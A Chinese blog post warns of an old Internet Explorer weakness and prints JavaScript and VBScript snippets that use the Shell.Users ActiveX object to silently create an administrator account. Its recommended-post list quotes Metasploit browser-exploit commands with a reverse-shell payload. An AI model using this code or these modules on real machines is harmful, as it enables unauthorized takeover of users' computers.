致命IE漏洞,轻松拿下pc最高权限!

最新推荐文章于 2025-09-06 08:01:57 发布
原创 最新推荐文章于 2025-09-06 08:01:57 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ie #javascript #vbscript #微软 #html #cmd

本文揭示了一个通过IE浏览器利用nusrmgr.cpl命令行文件创建系统用户的严重安全漏洞。该漏洞允许恶意用户在未授权的情况下创建具有管理员权限的账户,从而完全控制目标计算机。文章提供了JavaScript和VBScript两种实现方式,并强调了此漏洞对使用管理员权限浏览网页的用户的潜在威胁。

在7月2日,我逛国内的一个黑客网站,就看到一名为《在个命令行下加账号》的暴IE严重漏洞的文章,当时认为好玩,没有引起足够的重视,今天突然看到csdn中有篇《微软全球通告IE漏洞 官方建议关闭ActiveX》才认识到问题的严重性,更要命的是好几天了,微软还没有发布扑丁,这意味不怀好意的人,百发百中的攻击你。我想文章指的就是这个漏洞了。原文如下:

今天研究了一下用户控制面板文件nusrmgr.cpl(cmd中的命令),js,vbs两种代码,发现调用的是Shell.Users来加用户,它还同时调用了wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的加用户的方法。代码如下:

  js:
   var o=new ActiveXObject( "Shell.Users" );
   z=o.create("test") ;
   z.changePassword("123456","")
   z.setting("AccountType")=3;

  vbs:
   Set o=CreateObject( "Shell.Users" )
   Set z=o.create("test")
   z.changePassword "123456",""
   z.setting("AccountType")=3
 

注:本人现在在学javascript,对vbscript不感兴趣。所以就在本人的电脑上试过,将以上代码中的javascript代码复制写入任何一个html文件中,用IE打开,就会创建一个test的超级用户,当你重起计算机,你本来的超级用户账号会消失(你的管理员权限就没有了,系统都无法进)!等于黑客不费一点力,就控制了你的计算机,并且,你还失去了超级管理权限,对自己的电脑无能为力。当然,经本人测试,打开IE要在管理员权限下进行,非管理员权限会有js错误,提示没有创建AcitiveX对象的权限。对于大多以管理员身份上网的用户来说,是个致命的威胁,黑客不必知道你的账号和密码,就可创建一个他的超级用户账号,并封掉你的账号,你无法进去系统。

 

mangran32
关注
C++文件流:通过ofstream和ifstream轻松实现文件读写
Lion_Long的博客
03-28 3万+
C++文件流是用于进行文件读写操作的工具,它供了一种能够简单、高效地与外部文件进行交互的方式。C++中文件流主要通过ofstream和ifstream来实现对文件的写入和读取。ofstream(output file stream)用于写入文件,可以创建、打开并写入文件内容。ifstream(input file stream)用于读取文件内容,可以打开并读取文件中的数据。文件流操作可以是文本模式的,也可以是二进制模式的,允许以不同的方式对文件进行读取和写入。
客户端计算机硬件需求,票据交易系统客户端安装配置手册一、客户端计算机硬件要求.PDF...
weixin_30978427的博客
07-16 1020
票据交易系统客户端安装配置手册一、客户端计算机硬件要求:1、CPU:奔腾双核 2.2GHz(Intel(R) Pentium(R) Dual CPU E2200)及以上;2、内存:4G及以上。3、显示器分辨率:1920*1080(推荐)。4、客户端票据扫描仪分辨率:300DPI(彩色)及以上。5、客户端打印机:A4幅面激光打印机二、客户端计算机软件要求(安装票交所客户端前需要确认如下配置已经完成)...
ie浏览器修复_微软准备修复IE漏洞 可致黑客获取用户权限
weixin_39672011的博客
11-14 78
相信大家对IE浏览器应该都不陌生,作为Windows系统曾自带的浏览器,可以堪称为"装机量最高的浏览器"了。IE目前份额依然高达7.44%,比Windows 10预装浏览器Edge要高,仅比火狐浏览器低一些。 而据外媒报道称,在IE中一直存在着一个访问特制网站就可以导致远程执行代码的漏洞,该漏洞会影响IE9、10和11,其方式是让入侵者获得与用户相同的权限运行任意代码,让他们劫持电脑。目前,微软...
CVE-2018-8174(IE浏览器远程代码执行漏洞)
94小菜
11-29 893
漏洞描述: VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。      在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet Exp
渗透测试实战:利用漏洞(一)
qq_42242380的博客
10-14 1218
在一系列的渗透测试中,我们主要是使用了kali Linux作为攻击端,使用Windows xp作为靶机。话不多说,现在开始实践。 这次我们利用IE浏览器上的漏洞来对Windows xp进行(只要是为了拿到shell),本次利用漏洞为:ms10-002,是IE的一个经典漏洞(也被称为“极光”漏洞)。 1.我们先在kali Linux中打开msf,在框架下搜索ms10-002的漏洞利用模块并选择。...
利用XP ie浏览器的漏洞获取shell
weixin_44195546的博客
03-12 3477
实验环境:kali linux、windows XP Professional SP3. 实验工具:metasploit framework 功能实现模块:use exploit/windows/brower/ms14_064_ole_code_execution 实验过程: 1.执行模块,查看参数配置,并且设置payload(set payload windows/meterpreter/reverse_tcp): 2.其他参数无需再配置,直接run就行。(如果端口LPORT被占用了,可以用
vbs修改IE配置(详细,全面)
10-14
使用vbs修改IE配置,代码详细全面,适合各类学习或管理使用。
不能有的19个致命漏洞
08-06
一个都不能有 软件的19个致命漏洞 很好的学习文档,可以让开发更安全
【愚公系列】2024年03月 《CTF实战:从入门到升》 009-Web安全入门(PHP文件包含漏洞
热门推荐
时光隧道
03-01 9万+
PHP文件包含漏洞是指在PHP代码中存在安全漏洞,允许攻击者包含并执行恶意文件或代码。PHP文件包含漏洞通常发生在以下两种情况下:动态文件包含:当PHP代码使用动态输入来包含文件时,攻击者可能通过构造恶意输入来包含并执行任意文件。这可能会导致攻击者执行远程代码、读取服务器上的敏感文件,或者执行其他恶意操作。本地文件包含:当PHP代码使用本地文件路径来包含文件时,攻击者可能通过修改文件路径参数来包含并执行任意文件。这可能会导致攻击者读取服务器上的敏感文件,或者执行其他恶意操作。
网格交易最高境界!完美躺赢的秘密交易原理全曝光
landazhanggui6的博客
07-16 6802
网格交易最高境界!完美躺赢的秘密交易原理全曝光 欢迎来到《网格交易法宇宙专栏》,这是一篇导读文章,浓缩整个专栏知识,帮你建立系统交易框架,快速找到自己感兴趣的内容,相信我关于网格交易法的知识全在这里了。 蓝大掌柜:网格交易法交易规则详解 稳定盈利的科学本质​zhuanlan.zhihu.com 这篇文章说的是从零开始认识网格交易法,从交易规则到技术原理,从祖师爷到凯利公式证明网格交易是如何做到稳健盈利的。香农祖师爷应用网格交易法在十多年的交易生涯中,资金获得了29%的年复利增长,必读! 网格..
metasploit对IE浏览器的极光漏洞进行渗透利用
天元喜羊羊的博客
05-12 4961
msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > show op
通过注册表对INTERNET属性进行修改
weixin_57323573的博客
04-26 1045
使用VBS脚本对INTERNET 属性进行设置 另附:INTERNET属性快速打开方法 WIN+R - inetcpl.cpl 本脚本通过赋值reg_Path变量,通过修改USER注册表对用户INTERNET设置进行修改,因此脚本需以User权限运行且仅针对当前User生效。 注册表项也可使用组策略进行全员部署或组策略设立登录脚本运行,去除MessageBOX 简易版: 使用自动配置脚本如下(PAC文件): Dim g_wshShell: Set g_wshShell = WScrip..
漏洞利用与(一):基础
黎先生的博客
02-15 5220
1. 概述 1.1 概述 顾名思义就是高自己在系统中的利。渗透测试以获取系统的最高权限为目标,首先通过寻找漏洞,获取WebShell权限,然后进行可分为: 操作系统 Windows Linux Samba Android 应用程序 Seru-u Radmin SQL Server 2000/2005、MySQL、Oracle Java IE 例如Wi...
vbs打开ie两种方法 在VBScript中启动IE浏览器的实现代码
u010308173的专栏
08-15 1万+
第一种方法 InternetExplorer.Application  StartURL = "www.jb51.net"  set IE = CreateObject("InternetExplorer.Application")  IE.Visible = true  IE.Navigate StartURL  第二种方法 WScript.Shell dim Wsh  Set
MSF利用最新IE最新漏洞
www.i201314.net
07-01 1186
通过 backtrack 漏洞发布官网 了解最新漏洞 漏洞描述:漏洞存在iepeers.dll组件中,影响ie6 7 影响系统:sp0-3、ie 6 7 使用命令 show exploits use exploit/windows/browser/ie_iepeers_pointer show options set PAYLOAD windows/exec set CMD net user
Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
Epsilon
03-02 5165
极光漏洞实际上是利用了堆喷射技术。下面我们来演示渗透过程。 1、查看 win xp 系统状态 目前的cpu和内存消耗极低。 2、在kali linux下利用 metasploit 渗透。 msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/
Metasploit(msf)系列-利用浏览器漏洞渗透
chaojixiaojingang
09-20 4819
         我最近在学习Kali系统msf框架的使用,怎样利用浏览器漏洞渗透,现在我就把学习到的一点小成果展示出来。在此之前我要先介绍本次利用的漏洞是ms10_018,想具体了解该漏洞可以参考:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-018 Metasploit概述: ...
java小项目 未来出行汽车租赁平台
最新发布
xiaoyoukaoer的博客
09-06 247
未来出行汽车租赁平台是基于Java开发的汽车租赁管理系统,旨在为用户供便捷的车辆租赁服务。系统包含用户管理、车辆管理、订单管理等功能模块,适用于小型企业或个人学习使用。
fastjson致命漏洞
07-12
ta的语气比较急切,用了"致命漏洞"这样的词,说明问题可能比较紧急。考虑到fastjson在Java生态中的广泛使用,这确实是个重要问题。 从技术角度看,需要梳理fastjson历史上最严重的安全漏洞。根据引用[1][2][4]到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值